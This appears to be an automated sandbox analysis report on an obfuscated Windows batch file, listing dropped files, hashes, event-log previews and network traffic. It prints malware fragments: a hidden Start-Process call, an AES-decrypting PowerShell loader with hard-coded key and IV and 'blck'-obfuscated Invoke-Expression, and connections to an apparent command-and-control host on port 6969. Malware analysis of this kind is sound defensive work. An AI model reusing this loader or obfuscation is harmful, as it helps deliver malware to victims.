      Preview:ElfChnk.y...............y................... Q..(S...b.......................................................................t..............................................=.......................#...................................................................................................f...............?.......................P.......................M...F...............................................................................................................VG..................................**......y..........:............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):3.4074236171082695
      Encrypted:false
      SSDEEP:768:aTa0N7aPananajavanara3afaDaPaHaDa7aHa7araDa/azaTara3aHabajafaHav:8N
      MD5:896FEF5679C89EE51AB514435EC723B5
      SHA1:F5D99AF1D523B53967B2A43A7EBF6C0F34B3B5AA
      SHA-256:571373BA229A77DC4AF4CC66EF69F17D2E362DA66480BF5D56F297D68528EA77
      SHA-512:3970041CC336BB3808D5193617C625A53AD6BEFD65CFBDE7FF4B24BAF6A7F5978AB377E931FAE2B9E376874B5E9A716349815047F2F941257827AD518362B860
      Malicious:false
      Preview:ElfChnk.........@...............@...............`...o.{......................................................................h..................`...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................9...................................**..H.............A...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):1.3132453844344478
      Encrypted:false
      SSDEEP:384:hhaXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJnXJRXJtXJLXJjXJppXJ:hQ0yUkNYwD8imLE5nTtFpf
      MD5:6237EE0458A0478242B975E9BB7AA97D
      SHA1:6B0BDBA887DA21675A63FC73AED995B1BCA3F6B1
      SHA-256:C8E224C54278C206302EAD7011ACC48CAC60E7638E32EE70653190DBC90FA70A
      SHA-512:56C025C971F77AB8E911E0190E8AB5CF533A909C1BF4558876FB2761AAA381CB7D21E44A3273FA4427CB2FF7DEECC15A312DD2A424B96ABDC4886BDF233F30E9
      Malicious:false
      Preview:ElfChnk......................................<...A.........................................................................i,.q................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................<......C...........................**..............@V.$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):4.325262033408211
      Encrypted:false
      SSDEEP:384:6hYmn9moomUmKBmZOmZmlmmmomRmemtmsmimGmHmEmqmwmHmLmlm9mGmdmpm3mfO:6/fGTDcx
      MD5:D13189B45679E53F5744A4D449F8B00F
      SHA1:ED410CAB42772E329F656B4793B46AC7159CF05B
      SHA-256:BAA80D6A7DC42752766B1862A00009A1D76B57022A4D5A89692DBA2D6866EBA1
      SHA-512:83399CE082F8C6D2917B8363E053C770F2783B3D086F39736919FBFA533DF65993A3B7840A2E1000B08948584CF9750C27961BF8A7BE3A235B5DDD779616013F
      Malicious:false
      Preview:ElfChnk.....................................h.................................................................................-.................X...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................1...........&.......................................................................................**..x...........~_g...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):0.7947046118743749
      Encrypted:false
      SSDEEP:384:jhr2zS2o202AW2D2t2l292l2V2p2d2N2:j8Q
      MD5:55E73A924B170FBFFF862E8E195E839A
      SHA1:3C625D05DFC08AE9DF26AEBAA82D72FC9F28ADB0
      SHA-256:1B36D85AA56A023F6646D6EF28C9DCB5358528274EDCC9B6ED20705E3007E8A2
      SHA-512:E14D32569F37A827EDBD1F02667866431C856D087A396933DE5E9B87943369C4802D220557050C7B0FE9367FBD0683676776E6D3CCBCB290C9F30D86EC529E28
      Malicious:false
      Preview:ElfChnk...................................... ..X"...........................................................................?.................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...............................3...........................&.......................................................................................**................................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 9, DIRTY
      Category:dropped
      Size (bytes):84544
      Entropy (8bit):2.0937517667811107
      Encrypted:false
      SSDEEP:1536:bMpP9JcY6+g4+Ga6cMpP9JcY6+g4+Ga6VMpP9JcY6+g4+Ga6y:bMpP9JcY6+g4+Ga6cMpP9JcY6+g4+Gas
      MD5:DF7D9B8E431AE0086976C6C8D61A4AA1
      SHA1:CDCEBD1FA1A106F8A6D432F835EEB22FCF4CE495
      SHA-256:5AA4E6BD41034CE32058888DA0E32058F19C20111C528CAE1CCE2B3732A245C7
      SHA-512:1DC4C1F2B8B0443994EAE5356B7AB729F42DF8CF355CC45DBEF8E9989A2969D70A3C57B85D4272F1564976BEE6CE8C5C0602F3A0FC7864238E818197A733FD29
      Malicious:false
      Preview:ElfFile.........................................................................................................................ElfChnk.....................................p ..."....e.....................................................................!.xp................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................^...3...............................**................................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):66560
      Entropy (8bit):4.360289705952508
      Encrypted:false
      SSDEEP:384:tkRAxhSRumRtRqR5RVR+rRvR3RFRXRmRbR+RLRlRFRDRiwhR3KR31RIRB8R+PRdL:tbxA8nPLGbD
      MD5:C34CB431D02537390E70F4D7209592D1
      SHA1:D722DDF3A40498D3F8D04E36CE7890DC66154361
      SHA-256:A4B23D8EB6B5E77F4D092ACF45377ACE91CB01CB9B9927DCA59FB2686A86F2F4
      SHA-512:17009505FC8FC71FEB61D25F5D1037952FB9AAE78A26D3829E796F4CB7B18B2588593BCB32C5886723577587714C3B9E123688069A74024E3358904EC06B69CF
      Malicious:false
      Preview:ElfChnk................................................7......................................................................d......................y.......x..N...........=............................................y..................}y..3...........................................c......xb..f...h.......lc..?.......................h........c......M.......M...F...9c..............................................Qb..............................................A.......i.......................&............x..**...............%.............x68................................................................<.......T.....!................@.%......mz.B...N...r..V.`...p........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y.......#F.~.J.{..M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y./.O.p.e.r.a.t.i.o.n.a.l......Qb......................N...W.M.I.P.r.o.v.......w.m.i.p.r.v.s.e...e.x.e...`...%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.b.e.m.\.w.m.i.p
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):4.273338343434408
      Encrypted:false
      SSDEEP:384:mhWhjhUh4h4hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYhC1:mBsFpkBjOFK
      MD5:C37372EB51AEDB4552CB839C7294403A
      SHA1:7B7C408D72B084CE36AA6B623AC6B907FD21D569
      SHA-256:C3B5D9D16F88507EF69A9B6FF8581AEBAFF84D254F62CD4E75B6A9C6F93E93C4
      SHA-512:69183719C29FCE5CEDB2634579ABA9FEF835A3CDC7668BB741F9DB36050756C088FD331E898DA8E4850887FD217B939DF1C5A3E7D73D2260CB3AC3570E71718E
      Malicious:false
      Preview:ElfChnk....................................................................................................................x...........................................8...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..............i.T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):1.231195890775603
      Encrypted:false
      SSDEEP:384:ZhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVt9VjViVyVKVui:Zyjbn
      MD5:3365A34953FD7B16667108A049B64DA5
      SHA1:C72421A58E063D64072152344B266F8306A78702
      SHA-256:AAEDFFE84B66B602858AF51D5B2EBA7CFC9DB57A4A3DD3240DB44B737B9BBF26
      SHA-512:A5569EDC7516DACCCE7B3135114588E01ED1A77CA95B0F378E389E27AC8999EA71E8AF36FD275EEA7E81987CB9BF14910645DE3DC4FE8E086FF532796DD78AAF
      Malicious:false
      Preview:ElfChnk.........!...............!............7..`8...j......................................................................@..#................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v....................................................3..................................**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):4.3511865883847
      Encrypted:false
      SSDEEP:384:Jh+BwB5BwBjBwBNSBwBYiBwB+BwBXBwBZabSqBwBlQBwBtfBwBvBwBPnBwBIrBwc:JOqabeGTnbuSxQ
      MD5:E72186284271FFF786A622B1D15C9A40
      SHA1:69277A92F7C1AF6D3299A771090115516C58E255
      SHA-256:5F9E1C66300EE1B0ACEF5373AA42B982F6386ABE7A1E819B561DBDAFF1E8019B
      SHA-512:CB9DC49EB8174516BD360CE0FBEFE05D2E8A3EE3D698E787FFE912160DDE7D9B6BF786196875789D5B5D96250235D444633AC480D850155C2959A934B4B2C738
      Malicious:false
      Preview:ElfChnk.....................................H...x...X..........................................................................@............................................=...........................................................................................................................f...............?...........................m...................M...F....................S......................................&...................................u...................................................**...............Dbf..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):4.421206160086997
      Encrypted:false
      SSDEEP:384:ah1qUEzUELUEnUEQUEpUE9UE4UEvUEqUEGUEuUEyUEpjUEmUE6UEVUE1UEdUEoUF:arN5mPfkvmR
      MD5:67CAD90771EBC0BD20736201D89C1586
      SHA1:EE241B07EBD6E7A64AE367520F5C0665F4EBBAD7
      SHA-256:7801ED56F87C5A71A42128D089176CFDAACCCD6998EACCD07E46207F2CD48467
      SHA-512:27DE77A98E11A1D33B648B9F46671F61338B1746032B4AD8F003A8A5C52FB7C3ECCB834057074EF5FCD3459A0810439BAF63E1320B385F7A5E81757A90BBFD13
      Malicious:false
      Preview:ElfChnk.........l...............l...............@....^.....................................................................+t].................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......Q8.......................................................6......................**...............yM..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):69752
      Entropy (8bit):4.430470792529309
      Encrypted:false
      SSDEEP:384:M1ooWRoI8o+3ooWtooWkooW+ooWofFRfB52M7tUoqRMtEoO1nkocUo+tyZfohmBU:xzJdADmtq
      MD5:49335D3DF21A46F17E2B05135D60CB1B
      SHA1:28BF78A2E48FF5F6406F90ACA46F8151A6334C80
      SHA-256:E0AC870B8EC3A165F9D2FA5744D4DA2396DDA4BE775F29B4E20CAE5EF4BD03A5
      SHA-512:1E0F0A76BBB831533587C2AE619F0E5224B62EB679A731D7E65102F5F7D23E6D1FA5159CD58EFD31D8FFA2D7412D9C819D5BA59951E5DE78552C7768FC043E99
      Malicious:false
      Preview:ElfChnk.........-.......U............................$N........................................................................................Z...s...h...................=...................................................N...............................................w.......4.......................-...................................[...........).......M...R...:....................$......C+..3...........................&...............................................>.......................s5..........**......{.........................>...............................................................F.............!....6.......... ..........]{.SH.g.P...[t.......{........M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.A.u.d.i.t.i.n.g.%..TxT.I..>;.(..S.e.c.u.r.i.t.y....w"B........................N...........................................$.N......j.o.n.e.s...J.O.N.E.S.-.P.C...}@......M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.u.s.e.r.=.0.2.r.x.e.m.p.x.a.r.q.j.a.e.g.y...........%.%.8
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):4.419738232285116
      Encrypted:false
      SSDEEP:768:6N2xZFDVqYo6nLmLQXHmtpJnqiNHpzoQp:uMRz4MHmcs
      MD5:5231221188C34DA85A8C54CB787886E6
      SHA1:B5B7D7A5AA3497AE9C5C736A617478367775CC24
      SHA-256:D58CD0790E554BEBF1A235C89A8EE095B6CFFDBEC6742625EA7E12939531248B
      SHA-512:777F2978277EBFD9EEA88C863D1E09DCD2E60A5C393DDBFF7CCCEFB96B139C192E7C637C618EA9C1237382445A09CE5966845F1BB36CF73A4BA28FA4B9C62DC8
      Malicious:false
      Preview:ElfChnk.................m.......t...............h..../.......................................................................f................4...s...h...............\...=...................................................N...............................................w.......0.......................E...................................W...........).......M...3...:...........................................................................................................................&...................**......m.........Y............i.e&........i.e.t.Q...H.C.A;.......A../...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....X...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):322768
      Entropy (8bit):3.931182330987314
      Encrypted:false
      SSDEEP:6144:Oz3HkMz3Hiz3HmMz3HEz3HOz3HkMz3Hiz3HmMz3HEz3HxznazeRz3HkMz3Hiz3HC:
      MD5:B265346435737ABEE5A86F833B7D4B8C
      SHA1:C7E7A5FF2DE6E94CA9B6B8918BD582DF28D1DD49
      SHA-256:5E9FE5991734BE0E21C09FA685454E6A4F9F66E09DF3FE85AC5FAF438AC82738
      SHA-512:741602539D8918DEC25967165E491C76C0465A02507A83F8DA477E48ADE4A12E88E99E0967AAA90D8001BF038A10905CE4BBE49362A01DD6BDA72E7148C61709
      Malicious:false
      Preview:ElfChnk.............................................x.>.....................................................................M..............................................=..........................................................................................................................._...............8...........................f...................M...c...........................n...............................................&.......................................................................**..@............6.............B.&........B...._j..d.:Ad........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Preview:# PowerShell test file to determine AppLocker lockdown mode
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):60
      Entropy (8bit):4.038920595031593
      Encrypted:false
      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
      MD5:D17FE0A3F47BE24A6453E9EF58C94641
      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
      Malicious:false
      Preview:# PowerShell test file to determine AppLocker lockdown mode
      Process:C:\Windows\System32\WerFault.exe
      File Type:MS Windows registry file, NT/2000 or above
      Category:dropped
      Size (bytes):1835008
      Entropy (8bit):4.466477386756994
      Encrypted:false
      SSDEEP:6144:IIXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uN8dwBCswSb+:dXD94zWlLZMM6YFH6++
      MD5:7F6446FC1C006A982E9A08317B0577A1
      SHA1:D30A6BEF2C7A2ED4E857A924CFF10090A1FB5CB0
      SHA-256:E950D3F4C172F7A3D856F585A55B6A57E8F60F343198C8A9024A09BE60AFE419
      SHA-512:084F7E579E3ACD20004A773A9C7061D33F91D1E59A30A70214E15FFA58FA75583F6A833B80F7AFA7D856DA596846AAB8EAEEE319924000DE863C30741BD9DEA6
      Malicious:false
      Preview:regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.6J.................................................................................................................................................................................................................................................................................................................................................(.].........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Windows\System32\wbem\WMIADAP.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):3444
      Entropy (8bit):5.011954215267298
      Encrypted:false
      SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
      MD5:B133A676D139032A27DE3D9619E70091
      SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
      SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
      SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
      Malicious:false
      Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):85
      Entropy (8bit):4.84935141926561
      Encrypted:false
      SSDEEP:3:jKMFIwpVh+d3LKMP9IdXMfyM9oM3Ky:jKMFIsV8d7Koq01R3Ky
      MD5:D8C4F9FD5B972AE487170EA993933179
      SHA1:32E61F1DD8A462CEDC6B7A636275363B011ABDA9
      SHA-256:728A155A3A8272BB230C121C67CC90A986C11B84504E3902AC4EEDA9D8EC78ED
      SHA-512:1F4E7C0C8DC83C0280E77290CF76738D0611FBB9ADBC4D76A7DF4FD2E1EE49F684400E16008ED58D89009D4FE67C456094E9610279B4A20DDAC39038A3F5D4DF
      Malicious:false
      Preview:Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden ..
      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      File Type:ASCII text, with very long lines (2692), with CRLF line terminators
      Category:dropped
      Size (bytes):2839
      Entropy (8bit):5.269550461652421
      Encrypted:false
      SSDEEP:48:9JFHDRBXRG8R4YRxyKB3k4B3KX9zS3FXBvY595f8bLb8MS91ccCwMqu1whc9pWiM:PFHDRtVt7vBpB6a5xY595f8bus3wMVd2
      MD5:39401ABDD4A08EE5458DF7CB80F69CED
      SHA1:A4F498F6E926AC3A23F561C1C582C51217FA9093
      SHA-256:06CC781B4C21259ED5B86C26A54BFCFD61D5049BF62338571F77E801227FFAC1
      SHA-512:7BC97E8DF1C92730F6462151B688F1A5952F220199BD52F963A6CEA4DC04EEF6C842D776D26DF845688C369935DD71FFFE269AA75DC10B017F5926D21448C9BD
      Malicious:false
      Preview:Windows PowerShell..Copyright (C) Microsoft Corporation. All rights reserved.....Try the new cross-platform PowerShell https://aka.ms/pscore6....PS C:\Users\user\Desktop> function Rgueq($eXEDy){.$HKJEc=[System.Security.Cryptography.Aes]::Create();.$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;.$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;.$HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ=');.$HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA==');.$HipTi=$HKJEc.CreateDecryptor();.$ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length);.$HipTi.Dispose();.$HKJEc.Dispose();.$ioqgE;}function qVeuI($eXEDy){.Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', '');.Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblc
      File type:DOS batch file, ASCII text, with very long lines (5674), with CRLF line terminators
      Entropy (8bit):6.008710946572079
      TrID:
      • BibTeX references (5501/1) 100.00%
      File name:1.cmd
      File size:5'214'429 bytes
      MD5:19fc666f7494d78a55d6b50a0252c214
      SHA1:8876cd520507cbfdc2e89e449baba52232a1df1b
      SHA256:e96f8f61e3af77c429ae6af54c128f7b8420a45a0a63bdfcacd682773b8e5fc1
      SHA512:94dde8d5d0100e892ca004556b30b8e8fedacc1e3482dab9d611bd64569b2f73e29da93db2c7ae51585791a4f39d01426ee6663c48602de92aa74f6ebe3f630a
      SSDEEP:49152:9YFeyNRX+o9UIcbBIXu/DloMIZv/us2aFGKeXGuqzwIEqHL5l8M/CJs2:f
      TLSH:8536120B1D54ECBECDA50DAEE95A2F0FF432BE57F02909B6611B05BD07781E104D9A3A
      File Content Preview:@echo off..%^%@%KhlQYXcflBNlDRnjWyCtzUMbVdihsfHGoAGNTEJeLZNLqMbLlXPalwqPvjUVOUMfTgWclzprOxHzgaKicxWvpHuSkQsKJOpQnISjQYALHylNOQJuzMSrYqQlLdSuhFIahRmyiAsdWkORvHethXkXVYRWSGyNffDcPlGXEkmYtPvNCYPeZznkuLejZqGBcFYQHLck%%^%e%hPWLmDgCetTQtOGStIdgwXoEKVOREgRWEdRJq
      Icon Hash:9686878b929a9886
      TimestampSource PortDest PortSource IPDest IP
      Oct 4, 2024 05:24:35.080461025 CEST498616969192.168.2.4192.64.119.55
      Oct 4, 2024 05:24:35.085378885 CEST696949861192.64.119.55192.168.2.4
      Oct 4, 2024 05:24:35.085578918 CEST498616969192.168.2.4192.64.119.55
      Oct 4, 2024 05:24:35.092184067 CEST498616969192.168.2.4192.64.119.55
      Oct 4, 2024 05:24:35.097181082 CEST696949861192.64.119.55192.168.2.4
      Oct 4, 2024 05:24:56.445588112 CEST696949861192.64.119.55192.168.2.4
      Oct 4, 2024 05:24:56.445694923 CEST498616969192.168.2.4192.64.119.55
      Oct 4, 2024 05:24:56.452303886 CEST498616969192.168.2.4192.64.119.55
      Oct 4, 2024 05:24:56.457267046 CEST696949861192.64.119.55192.168.2.4
      Oct 4, 2024 05:24:59.785219908 CEST500136969192.168.2.4192.64.119.55
      Oct 4, 2024 05:24:59.790450096 CEST696950013192.64.119.55192.168.2.4
      Oct 4, 2024 05:24:59.792226076 CEST500136969192.168.2.4192.64.119.55
      Oct 4, 2024 05:24:59.795909882 CEST500136969192.168.2.4192.64.119.55
      Oct 4, 2024 05:24:59.800807953 CEST696950013192.64.119.55192.168.2.4
      Oct 4, 2024 05:25:21.166666985 CEST696950013192.64.119.55192.168.2.4
      Oct 4, 2024 05:25:21.166768074 CEST500136969192.168.2.4192.64.119.55
      Oct 4, 2024 05:25:21.167145967 CEST500136969192.168.2.4192.64.119.55
      Oct 4, 2024 05:25:21.171947956 CEST696950013192.64.119.55192.168.2.4
      Oct 4, 2024 05:25:24.470298052 CEST500146969192.168.2.4192.64.119.55
